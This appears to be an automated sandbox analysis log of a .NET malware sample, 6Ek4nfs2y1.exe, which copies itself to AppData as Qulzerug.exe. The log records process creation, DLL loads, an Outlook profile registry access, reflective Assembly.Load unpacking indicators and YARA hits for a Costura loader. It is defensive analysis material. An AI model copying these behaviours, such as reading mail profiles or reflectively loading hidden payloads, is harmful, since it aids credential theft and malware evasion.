Source: unknown	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Process created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Process created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Section loaded: userenv.dll

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 6Ek4nfs2y1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 6Ek4nfs2y1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 6Ek4nfs2y1.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: Qulzerug.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.6Ek4nfs2y1.exe.7b10000.14.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.6Ek4nfs2y1.exe.2d3b804.3.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.6Ek4nfs2y1.exe.6b660c0.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.5860000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4a24a70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6a9e080.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.644f058.6.raw.unpack, type: UNPACKEDPE
